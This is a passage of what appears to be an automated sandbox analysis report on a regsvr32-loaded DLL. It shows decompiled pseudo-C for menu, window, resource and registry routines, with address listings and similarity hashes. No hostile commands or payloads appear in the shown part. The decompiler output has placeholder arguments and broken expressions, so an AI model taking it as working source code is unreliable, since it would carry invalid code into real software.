						E1003A240(_t46, 0x80070057, 0,  *_t88, _t111, _t126);
						_t139 = _t122;
						_t112 = _t126;
						_t48 = E10038D40(_t81,  *_t88, _t126, _t122, 0xffffffff);
						if(_t48 != 0) {
							if(_t48 == 0xc) {
								L23:
								_t48 = E100164FC();
								asm("int3");
							} else {
								if(_t48 == 0x16 || _t48 == 0x22) {
									L22:
									E10016544();
									asm("int3");
									goto L23;
								} else {
									if(_t48 != 0x50) {
										E10016544();
										asm("int3");
										goto L22;
									}
								}
							}
						}
						__imp__PathStripToRootW();
						_t96 =  *_t88;
						if(_t96 != 0) {
							_t49 = E10039820(_t48, _t96);
							if(_t49 < 0) {
								goto L29;
							} else {
								goto L27;
							}
						} else {
							_t49 = 0;
							L27:
							_t96 =  *_t88;
							if(_t49 >  *((intOrPtr*)(_t96 - 0xc))) {
								L29:
								E10009538(0x80070057, 0, _t81, _t88, _t96, _t112, _t118, _t139, 0xffffffff, _t142);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t88);
								_t132 = _t131 - 0x460;
								_v1232 = 0xfffffffe;
								_t82 =  *0x1006f4c8; // 0x6f13091946cb
								_v200 = _t82 ^ _t131 - 0x00000460;
								_t89 = _t96;
								_v1248 = _t96;
								 *_t96 = 0x1005c508;
								if( *((long long*)(_t96 + 8)) != 0xffffffff &&  *((intOrPtr*)(_t96 + 0x10)) != 0) {
									E1002FD48(0, _t96, _t122);
								}
								_t114 =  *((intOrPtr*)(_t89 + 0x18)) - 0x18;
								asm("lock xadd [edx+0x10], eax");
								if(0x1fffffffe <= 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t114)) + 8))();
								}
								return E10038D20(0x80070057, _v200 ^ _t132);
							} else {
								 *(_t96 - 0x10) = _t49;
								 *((short*)( *_t88 + _t49 * 2)) = 0;
								return _t49;
							}
						}
					} else {
						 *(_t92 - 0x10) = _t43;
						 *((short*)( *_t87 + _t43 * 2)) = 0;
						return 0;
					}
				}
			}

































                                                                              0x1002ff00
                                                                              0x1002ff00
                                                                              0x1002ff03
                                                                              0x1002ff04
                                                                              0x1002ff05
                                                                              0x1002ff09
                                                                              0x1002ff0e
                                                                              0x1002ff17
                                                                              0x1002ff17
                                                                              0x1002ff1b
                                                                              0x1002ff23
                                                                              0x1002ff2a
                                                                              0x1002ff2f
                                                                              0x1002ff32
                                                                              0x1002ff37
                                                                              0x1002ff37
                                                                              0x1002ff3c
                                                                              0x1002ff3f
                                                                              0x1002ff44
                                                                              0x1002ff52
                                                                              0x1002ff5a
                                                                              0x1002ff69
                                                                              0x1002ff74
                                                                              0x1002ff79
                                                                              0x1002ff7c
                                                                              0x1002ff89
                                                                              0x1002ff90
                                                                              0x1002ff98
                                                                              0x1002ff9f
                                                                              0x1002ffaf
                                                                              0x1002ffb9
                                                                              0x1002ffbe
                                                                              0x1002ffc6
                                                                              0x1002ffcb
                                                                              0x1002ffd2
                                                                              0x1002ffd5
                                                                              0x1002ffea
                                                                              0x1002ffee
                                                                              0x1002ffee
                                                                              0x1002fff9
                                                                              0x1002fff9
                                                                              0x10030004
                                                                              0x10030004
                                                                              0x1003000a
                                                                              0x10030010
                                                                              0x10030016
                                                                              0x1003001d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10030012
                                                                              0x10030012
                                                                              0x1003001f
                                                                              0x1003001f
                                                                              0x10030025
                                                                              0x10030041
                                                                              0x10030046
                                                                              0x1003004b
                                                                              0x1003004c
                                                                              0x1003004e
                                                                              0x1003004f
                                                                              0x10030050
                                                                              0x10030051
                                                                              0x10030055
                                                                              0x10030058
                                                                              0x10030063
                                                                              0x1003006a
                                                                              0x1003006d
                                                                              0x1003006f
                                                                              0x10030072
                                                                              0x10030075
                                                                              0x1003007c
                                                                              0x1003007c
                                                                              0x10030081
                                                                              0x1003008c
                                                                              0x10030098
                                                                              0x1003009b
                                                                              0x100300a1
                                                                              0x100300a8
                                                                              0x100300ad
                                                                              0x100300ca
                                                                              0x100300ca
                                                                              0x100300cf
                                                                              0x100300af
                                                                              0x100300b2
                                                                              0x100300c4
                                                                              0x100300c4
                                                                              0x100300c9
                                                                              0x00000000
                                                                              0x100300b9
                                                                              0x100300bc
                                                                              0x100300be
                                                                              0x100300c3
                                                                              0x00000000
                                                                              0x100300c3
                                                                              0x100300bc
                                                                              0x100300b2
                                                                              0x100300ad
                                                                              0x100300d3
                                                                              0x100300d9
                                                                              0x100300df
                                                                              0x100300e5
                                                                              0x100300ec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100300e1
                                                                              0x100300e1
                                                                              0x100300ee
                                                                              0x100300ee
                                                                              0x100300f4
                                                                              0x1003010e
                                                                              0x10030113
                                                                              0x10030118
                                                                              0x10030119
                                                                              0x1003011a
                                                                              0x1003011b
                                                                              0x1003011c
                                                                              0x1003011e
                                                                              0x10030125
                                                                              0x1003012e
                                                                              0x10030138
                                                                              0x10030140
                                                                              0x10030143
                                                                              0x1003014f
                                                                              0x10030157
                                                                              0x1003015f
                                                                              0x1003015f
                                                                              0x10030170
                                                                              0x10030179
                                                                              0x10030183
                                                                              0x1003018b
                                                                              0x1003018b
                                                                              0x100301a6
                                                                              0x100300f6
                                                                              0x100300f6
                                                                              0x100300ff
                                                                              0x1003010d
                                                                              0x1003010d
                                                                              0x100300f4
                                                                              0x10030027
                                                                              0x10030027
                                                                              0x10030030
                                                                              0x10030040
                                                                              0x10030040
                                                                              0x10030025

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen$QueryValue
                                                                              • String ID: CLSID$InProcServer32
                                                                              • API String ID: 3523390698-323508013
                                                                              • Opcode ID: b619a99a0198e822f10e35d166f6a025bcd4b5d1ae169181dd590d2d5a3af112
                                                                              • Instruction ID: cbd704f440ce356c78d04cd91eb6c2275be00faa3a98eb4220b3263e610b4c0e
                                                                              • Opcode Fuzzy Hash: b619a99a0198e822f10e35d166f6a025bcd4b5d1ae169181dd590d2d5a3af112
                                                                              • Instruction Fuzzy Hash: D7319072315A8186EB51CF25E85079E73A0FB88BC4F519111EB8A87664DF7CC489CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000DFD8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: System$Metrics$ByteCharInfoMultiParametersWide
                                                                              • String ID: $($DISPLAY$h$h
                                                                              • API String ID: 1415089127-3404381076
                                                                              • Opcode ID: ab6a8c0fec67eba843a9e7cd300939f6b0f48df0e374a4ae270a2a28a651d482
                                                                              • Instruction ID: f15c981df966eade4359f3da0f490e84a1650fab0914ca311bcbd30eb9f4f433
                                                                              • Opcode Fuzzy Hash: ab6a8c0fec67eba843a9e7cd300939f6b0f48df0e374a4ae270a2a28a651d482
                                                                              • Instruction Fuzzy Hash: 0F217FB260078187FB55CF20E80839D77E1F788BD8F55812ACA4556658DFBCC9D8CB11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001ABD8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                              • String ID: Marlett
                                                                              • API String ID: 1397664628-3688754224
                                                                              • Opcode ID: 4bef61f8c92765fe20a64de6f4beb903d2d107c9d0020fcd2a7de4ae797a0513
                                                                              • Instruction ID: 98daa55628c2f689481e9aad252f4ddc00565e572af350a79cef6504884247b7
                                                                              • Opcode Fuzzy Hash: 4bef61f8c92765fe20a64de6f4beb903d2d107c9d0020fcd2a7de4ae797a0513
                                                                              • Instruction Fuzzy Hash: 9A215B757106508BE7158F25A84479AB6A1F78CB94F114129EA8A47B64DFBCC4C48B40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10028244 Relevance: 15.2, APIs: 10, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E10028244(void* __ebx, void* __ecx, signed int __edx, void* __esi, void* __rax, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9, void* __r11, long long _a8, signed int _a16, signed int _a24, long long _a32) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				intOrPtr _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				int _t41;
				signed int _t46;
				signed int _t56;
				signed int _t59;
				signed int _t60;
				long long _t75;
				intOrPtr _t103;
				intOrPtr* _t105;
				long long _t106;
				signed int _t107;
				intOrPtr* _t116;
				long long _t117;

				_t115 = __r11;
				_t113 = __r9;
				_t111 = __r8;
				_t102 = __rdx;
				_t70 = __esi;
				_t68 = __edx;
				_t66 = __ecx;
				_t65 = __ebx;
				_a8 = __rcx;
				_v72 = 0xfffffffe;
				_t105 = __rcx;
				_t106 =  *((intOrPtr*)(__rcx + 0xc0));
				_v96 = _t106;
				_t117 =  *((intOrPtr*)(__rcx + 0xb8));
				_v88 = _t117;
				_t41 = E1000A57C(__ebx, __ecx, __edx, __esi, __rax, __r8, __r9, __r11);
				_t75 =  *((intOrPtr*)(__rax + 0x18));
				_v104 = _t75;
				if( *((long long*)(_t105 + 0xb0)) != 0) {
					E1000A57C(__ebx, __ecx, __edx, __esi, _t75, __r8, __r9, __r11);
					_t116 =  *((intOrPtr*)(_t75 + 0x18));
					_v104 = _t116;
					r8d = 5;
					FindResourceW(??, ??, ??);
					_t102 = _t75;
					_t41 = LoadResource(??, ??);
					_t117 = _t75;
					_v88 = _t75;
				}
				if(_t117 != 0) {
					_t41 = LockResource();
					_t106 = _t75;
					_v96 = _t75;
				}
				if(_t106 != 0) {
					E10027B54(_t65, _t68, _t70, _t75, _t105, _t102, _t111, _t113, _t115);
					_t107 = _t75;
					_v80 = _t75;
					E1001190C(_t65, _t66, _t68, _t70, _t75, _t111, _t113, _t115);
					r15d = 0;
					_a16 = r15d;
					r12d = 0;
					_a32 = _t116;
					r14d = 0;
					_a24 = r14d;
					__eflags = _t107;
					if(_t107 != 0) {
						GetDesktopWindow();
						__eflags = _t107 - _t75;
						if(_t107 != _t75) {
							_t56 = IsWindowEnabled();
							__eflags = _t56;
							if(_t56 != 0) {
								_t68 = 0;
								EnableWindow(??, ??);
								_t20 = _t116 + 1; // 0x1
								r15d = _t20;
								_a16 = r15d;
								E10023E40(_t75);
								__eflags = _t75;
								if(_t75 == 0) {
									_a32 = _t116;
								} else {
									_t102 =  *_t75;
									 *((intOrPtr*)( *_t75 + 0xe8))();
									_t116 = _t75;
									_a32 = _t75;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									_t75 =  *_t116;
									_t59 =  *((intOrPtr*)(_t75 + 0x240))();
									__eflags = _t59;
									if(_t59 != 0) {
										_t60 = E10016184(_t116);
										__eflags = _t60;
										if(_t60 != 0) {
											_t68 = 0;
											__eflags = 0;
											E100161B4(_t116);
											r14d = r15d;
											_a24 = r15d;
										}
									}
								}
							}
						}
					}
					E100140D0(_t65, _t66, _t68, _t70, _t75, _t105, _t111, _t113, _t115);
					E10011808(_t65, _t68, _t75, _t107, _t102, _t111, _t113, _t115);
					_t114 = _v104;
					_t112 = _t75;
					_t103 = _v96;
					_t46 = E10027F0C(_t75, _t105, _t103, _t75, _v104);
					__eflags = _t46;
					if(_t46 != 0) {
						__eflags =  *(_t105 + 0x78) & 0x00000010;
						if(( *(_t105 + 0x78) & 0x00000010) != 0) {
							E10016020(_t105);
							asm("bt eax, 0x8");
							_t32 = _t103 + 1; // 0x5
							_t68 =  <  ? _t32 : 4;
							E100111A4(_t65,  <  ? _t32 : 4, _t75, _t105, _t103, _t112, _t114, _t115);
						}
						__eflags =  *((long long*)(_t105 + 0x40));
						if( *((long long*)(_t105 + 0x40)) != 0) {
							_v120 = 0x97;
							_v128 = 0;
							_v136 = 0;
							r9d = 0;
							r8d = 0;
							_t68 = 0;
							__eflags = 0;
							E1001621C(_t105, _t103);
						}
					}
					__eflags = r14d;
					if(r14d != 0) {
						_t68 = 1;
						E100161B4(_t116);
					}
					__eflags = r15d;
					if(r15d != 0) {
						_t68 = 1;
						EnableWindow(??, ??);
					}
					__eflags = _t107;
					if(__eflags != 0) {
						GetActiveWindow();
						__eflags = _t75 -  *((intOrPtr*)(_t105 + 0x40));
						if(__eflags == 0) {
							SetActiveWindow();
						}
					}
					 *((intOrPtr*)( *_t105 + 0xc0))();
					_t41 = E10027BAC(_t68, _t70, __eflags,  *_t105, _t105, _t112, _t114, _t115);
					__eflags =  *((long long*)(_t105 + 0xb0));
					if( *((long long*)(_t105 + 0xb0)) != 0) {
						_t41 = FreeResource();
					}
					goto L32;
				} else {
					L32:
					return _t41;
				}
			}























                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028244
                                                                              0x10028257
                                                                              0x10028260
                                                                              0x10028263
                                                                              0x1002826a
                                                                              0x1002826f
                                                                              0x10028276
                                                                              0x1002827b
                                                                              0x10028280
                                                                              0x10028284
                                                                              0x10028291
                                                                              0x10028293
                                                                              0x10028298
                                                                              0x1002829c
                                                                              0x100282a1
                                                                              0x100282b1
                                                                              0x100282b7
                                                                              0x100282bd
                                                                              0x100282c3
                                                                              0x100282c6
                                                                              0x100282c6
                                                                              0x100282ce
                                                                              0x100282d3
                                                                              0x100282d9
                                                                              0x100282dc
                                                                              0x100282dc
                                                                              0x100282e4
                                                                              0x100282f2
                                                                              0x100282f7
                                                                              0x100282fa
                                                                              0x100282ff
                                                                              0x10028304
                                                                              0x10028307
                                                                              0x1002830f
                                                                              0x10028312
                                                                              0x1002831a
                                                                              0x1002831d
                                                                              0x10028325
                                                                              0x10028328
                                                                              0x1002832e
                                                                              0x10028334
                                                                              0x10028337
                                                                              0x10028340
                                                                              0x10028346
                                                                              0x10028348
                                                                              0x1002834a
                                                                              0x1002834f
                                                                              0x10028355
                                                                              0x10028355
                                                                              0x1002835a
                                                                              0x10028362
                                                                              0x10028367
                                                                              0x1002836a
                                                                              0x10028385
                                                                              0x1002836c
                                                                              0x1002836c
                                                                              0x10028372
                                                                              0x10028378
                                                                              0x1002837b
                                                                              0x1002837b
                                                                              0x1002838d
                                                                              0x10028390
                                                                              0x10028392
                                                                              0x10028399
                                                                              0x1002839f
                                                                              0x100283a1
                                                                              0x100283a6
                                                                              0x100283ab
                                                                              0x100283ad
                                                                              0x100283af
                                                                              0x100283af
                                                                              0x100283b4
                                                                              0x100283b9
                                                                              0x100283bc
                                                                              0x100283bc
                                                                              0x100283ad
                                                                              0x100283a1
                                                                              0x10028390
                                                                              0x10028348
                                                                              0x10028337
                                                                              0x100283c7
                                                                              0x100283cf
                                                                              0x100283d4
                                                                              0x100283d9
                                                                              0x100283dc
                                                                              0x100283e4
                                                                              0x100283e9
                                                                              0x100283eb
                                                                              0x100283ed
                                                                              0x100283f1
                                                                              0x100283f6
                                                                              0x100283fb
                                                                              0x10028404
                                                                              0x10028407
                                                                              0x1002840d
                                                                              0x1002840d
                                                                              0x10028412
                                                                              0x10028417
                                                                              0x10028419
                                                                              0x10028421
                                                                              0x10028429
                                                                              0x10028431
                                                                              0x10028434
                                                                              0x10028437
                                                                              0x10028437
                                                                              0x1002843c
                                                                              0x1002843c
                                                                              0x10028417
                                                                              0x1002846e
                                                                              0x10028471
                                                                              0x10028473
                                                                              0x1002847b
                                                                              0x1002847b
                                                                              0x10028480
                                                                              0x10028483
                                                                              0x10028485
                                                                              0x1002848d
                                                                              0x1002848d
                                                                              0x10028493
                                                                              0x10028496
                                                                              0x10028498
                                                                              0x1002849e
                                                                              0x100284a2
                                                                              0x100284a7
                                                                              0x100284a7
                                                                              0x100284a2
                                                                              0x100284b3
                                                                              0x100284bc
                                                                              0x100284c1
                                                                              0x100284c9
                                                                              0x100284ce
                                                                              0x100284ce
                                                                              0x00000000
                                                                              0x100282e6
                                                                              0x100284db
                                                                              0x100284e9
                                                                              0x100284e9

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeHookLoadLockUnhookWindows
                                                                              • String ID:
                                                                              • API String ID: 3362358738-0
                                                                              • Opcode ID: 9c4e4022fe95ddaed0476d2068e398d77a727738f653b8ee8e7547b0a4cdb2e8
                                                                              • Instruction ID: 8e4ab8f472063809d5537d4384aa18dd8cd9879f16d7e3695b9eff40f87c4a5a
                                                                              • Opcode Fuzzy Hash: 9c4e4022fe95ddaed0476d2068e398d77a727738f653b8ee8e7547b0a4cdb2e8
                                                                              • Instruction Fuzzy Hash: 4B51D63930AB8082EB59DF12B9143AE73A5FB8AFD4F514124EE8A07B54DF38D595C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001E628 Relevance: 15.1, APIs: 10, Instructions: 147windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 56%
                                                                              			E1001E628(void* __ecx, void* __edx, void* __ebp, void* __eflags, long long __rax, long long __rcx, long long __rdx, void* __r8, void* __r9, void* __r11) {
				int _t40;
				int _t48;
				void* _t53;
				void* _t56;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t65;
				void* _t82;
				long long _t84;
				long long _t105;
				long long _t106;
				long long _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t111 = __r11;
				_t110 = __r9;
				_t109 = __r8;
				_t104 = __rdx;
				_t84 = __rax;
				_t56 = __edx;
				_t53 = __ecx;
				_t107 = __rcx;
				_t52 = r9d;
				_t65 = r8d;
				_t105 = __rdx;
				_t40 = E10029D40(__rax,  *((intOrPtr*)(__rcx + 0x40)));
				if(r9d == 0) {
					if( *((long long*)(_t107 + 0xe0)) == 0) {
						L3:
						if(_t105 == 0) {
							E10016544();
							asm("int3");
						}
						E1000A9B4(_t108 + 0x20);
						 *((long long*)(_t108 + 0x30)) = _t105;
						E10009A4C(_t52, _t53, _t56, _t65, _t84, _t109, _t110, _t111);
						if( *((intOrPtr*)(_t84 + 0xd0)) !=  *((intOrPtr*)(_t105 + 8))) {
							GetMenu();
							if(_t84 != 0) {
								E10013600(_t65, _t84, _t107, _t104, _t111);
								if(_t84 != 0) {
									GetMenu();
									_t106 = _t84;
									if(_t84 != 0) {
										_t48 = GetMenuItemCount();
										_t52 = 0;
										r12d = _t48;
										if(_t48 > 0) {
											while(1) {
												_t64 = _t52;
												GetSubMenu(??, ??);
												if(_t84 ==  *((intOrPtr*)(_t105 + 8))) {
													break;
												}
												_t52 = _t52 + 1;
												if(_t52 < r12d) {
													continue;
												} else {
												}
												goto L15;
											}
											E1002AC28(_t52, _t64, _t84, _t106, _t104, _t109, _t110, _t111);
											 *((long long*)(_t108 + 0x58)) = _t84;
										}
									}
								}
							}
						} else {
							 *((long long*)(_t108 + 0x58)) = _t105;
						}
						L15:
						_t40 = GetMenuItemCount();
						 *(_t108 + 0x50) = _t40;
						 *((intOrPtr*)(_t108 + 0x2c)) = 0;
						if(_t40 != 0) {
							do {
								_t40 = GetMenuItemID();
								 *(_t108 + 0x28) = _t40;
								if(_t40 == 0) {
									L34:
									_t52 =  *(_t108 + 0x50);
									_t58 =  *((intOrPtr*)(_t108 + 0x2c));
								} else {
									if(_t40 != 0xffffffff) {
										 *((long long*)(_t108 + 0x38)) = 0;
										if( *((intOrPtr*)(_t107 + 0xa8)) == 0 || _t40 >= 0xf000) {
											goto L22;
										} else {
											r8d = 1;
											goto L23;
										}
									} else {
										GetSubMenu();
										_t40 = E1002AC28(_t52,  *((intOrPtr*)(_t108 + 0x2c)), _t84, _t84, _t104, _t109, _t110, _t111);
										 *((long long*)(_t108 + 0x38)) = _t84;
										if(_t84 == 0) {
											goto L34;
										} else {
											_t40 = GetMenuItemID();
											 *(_t108 + 0x28) = _t40;
											if(_t40 == 0 || _t40 == 0xffffffff) {
												goto L34;
											} else {
												L22:
												r8d = 0;
												L23:
												_t104 = _t107;
												E1000A9E4(_t84, _t108 + 0x20, _t107);
												_t40 = GetMenuItemCount(??);
												_t52 = _t40;
												if(_t40 >=  *(_t108 + 0x50)) {
													L32:
													_t58 =  *((intOrPtr*)(_t108 + 0x2c));
												} else {
													_t58 =  *((intOrPtr*)(_t108 + 0x2c)) + _t40 -  *(_t108 + 0x50);
													_t82 = _t58 - _t40;
													while(1) {
														 *((intOrPtr*)(_t108 + 0x2c)) = _t58;
														if(_t82 >= 0) {
															break;
														}
														_t40 = GetMenuItemID();
														if(_t40 !=  *(_t108 + 0x28)) {
															goto L32;
														} else {
															_t58 =  *((intOrPtr*)(_t108 + 0x2c)) + 1;
															continue;
														}
														goto L33;
													}
												}
												L33:
												 *(_t108 + 0x50) = _t52;
											}
										}
									}
								}
								_t59 = _t58 + 1;
								 *((intOrPtr*)(_t108 + 0x2c)) = _t59;
							} while (_t59 < _t52);
						}
					} else {
						r9d = 0;
						r8d = _t65;
						_t84 =  *((intOrPtr*)( *((intOrPtr*)(_t107 + 0xe0))));
						_t104 = __rdx;
						_t40 =  *((intOrPtr*)(_t84 + 0xe8))();
						if(_t40 == 0) {
							goto L3;
						}
					}
				}
				return _t40;
			}




















                                                                              0x1001e628
                                                                              0x1001e628
                                                                              0x1001e628
                                                                              0x1001e628
                                                                              0x1001e628
                                                                              0x1001e628
                                                                              0x1001e628
                                                                              0x1001e633
                                                                              0x1001e63a
                                                                              0x1001e63d
                                                                              0x1001e640
                                                                              0x1001e643
                                                                              0x1001e64a
                                                                              0x1001e658
                                                                              0x1001e67b
                                                                              0x1001e67e
                                                                              0x1001e680
                                                                              0x1001e685
                                                                              0x1001e685
                                                                              0x1001e68b
                                                                              0x1001e690
                                                                              0x1001e695
                                                                              0x1001e6a5
                                                                              0x1001e6b2
                                                                              0x1001e6bb
                                                                              0x1001e6c0
                                                                              0x1001e6c8
                                                                              0x1001e6ce
                                                                              0x1001e6d7
                                                                              0x1001e6da
                                                                              0x1001e6df
                                                                              0x1001e6e5
                                                                              0x1001e6e9
                                                                              0x1001e6ec
                                                                              0x1001e6ee
                                                                              0x1001e6ee
                                                                              0x1001e6f3
                                                                              0x1001e6fd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001e6ff
                                                                              0x1001e705
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001e707
                                                                              0x00000000
                                                                              0x1001e705
                                                                              0x1001e70c
                                                                              0x1001e711
                                                                              0x1001e711
                                                                              0x1001e6ec
                                                                              0x1001e6da
                                                                              0x1001e6c8
                                                                              0x1001e6a7
                                                                              0x1001e6a7
                                                                              0x1001e6a7
                                                                              0x1001e716
                                                                              0x1001e71a
                                                                              0x1001e724
                                                                              0x1001e728
                                                                              0x1001e72c
                                                                              0x1001e737
                                                                              0x1001e73b
                                                                              0x1001e743
                                                                              0x1001e747
                                                                              0x1001e80f
                                                                              0x1001e80f
                                                                              0x1001e813
                                                                              0x1001e74d
                                                                              0x1001e74f
                                                                              0x1001e7ca
                                                                              0x1001e7d3
                                                                              0x00000000
                                                                              0x1001e7dc
                                                                              0x1001e7dc
                                                                              0x00000000
                                                                              0x1001e7dc
                                                                              0x1001e751
                                                                              0x1001e759
                                                                              0x1001e762
                                                                              0x1001e76a
                                                                              0x1001e76f
                                                                              0x00000000
                                                                              0x1001e775
                                                                              0x1001e77b
                                                                              0x1001e783
                                                                              0x1001e787
                                                                              0x00000000
                                                                              0x1001e791
                                                                              0x1001e791
                                                                              0x1001e791
                                                                              0x1001e794
                                                                              0x1001e799
                                                                              0x1001e79c
                                                                              0x1001e7a5
                                                                              0x1001e7af
                                                                              0x1001e7b1
                                                                              0x1001e805
                                                                              0x1001e805
                                                                              0x1001e7b3
                                                                              0x1001e7bd
                                                                              0x1001e7bf
                                                                              0x1001e7fd
                                                                              0x1001e7fd
                                                                              0x1001e801
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001e7e8
                                                                              0x1001e7f2
                                                                              0x00000000
                                                                              0x1001e7f4
                                                                              0x1001e7f8
                                                                              0x00000000
                                                                              0x1001e7fb
                                                                              0x00000000
                                                                              0x1001e7f2
                                                                              0x1001e803
                                                                              0x1001e809
                                                                              0x1001e809
                                                                              0x1001e809
                                                                              0x1001e787
                                                                              0x1001e76f
                                                                              0x1001e74f
                                                                              0x1001e817
                                                                              0x1001e81c
                                                                              0x1001e81c
                                                                              0x1001e737
                                                                              0x1001e65a
                                                                              0x1001e661
                                                                              0x1001e664
                                                                              0x1001e667
                                                                              0x1001e66a
                                                                              0x1001e66d
                                                                              0x1001e675
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001e675
                                                                              0x1001e658
                                                                              0x1001e830

                                                                              APIs
                                                                                • Part of subcall function 10029D40: GetFocus.USER32 ref: 10029D4A
                                                                                • Part of subcall function 10029D40: GetParent.USER32 ref: 10029D71
                                                                                • Part of subcall function 10029D40: GetWindowLongW.USER32 ref: 10029D9D
                                                                                • Part of subcall function 10029D40: GetParent.USER32 ref: 10029DAC
                                                                                • Part of subcall function 10029D40: GetDesktopWindow.USER32 ref: 10029DB5
                                                                                • Part of subcall function 10029D40: SendMessageW.USER32 ref: 10029DCE
                                                                              • GetMenu.USER32 ref: 1001E6B2
                                                                              • GetMenu.USER32 ref: 1001E6CE
                                                                              • GetMenuItemCount.USER32 ref: 1001E6DF
                                                                              • GetSubMenu.USER32 ref: 1001E6F3
                                                                              • GetMenuItemCount.USER32 ref: 1001E71A
                                                                              • GetMenuItemID.USER32 ref: 1001E73B
                                                                              • GetSubMenu.USER32 ref: 1001E759
                                                                              • GetMenuItemID.USER32 ref: 1001E77B
                                                                              • GetMenuItemCount.USER32 ref: 1001E7A5
                                                                              • GetMenuItemID.USER32 ref: 1001E7E8
                                                                              Memory Dump Source
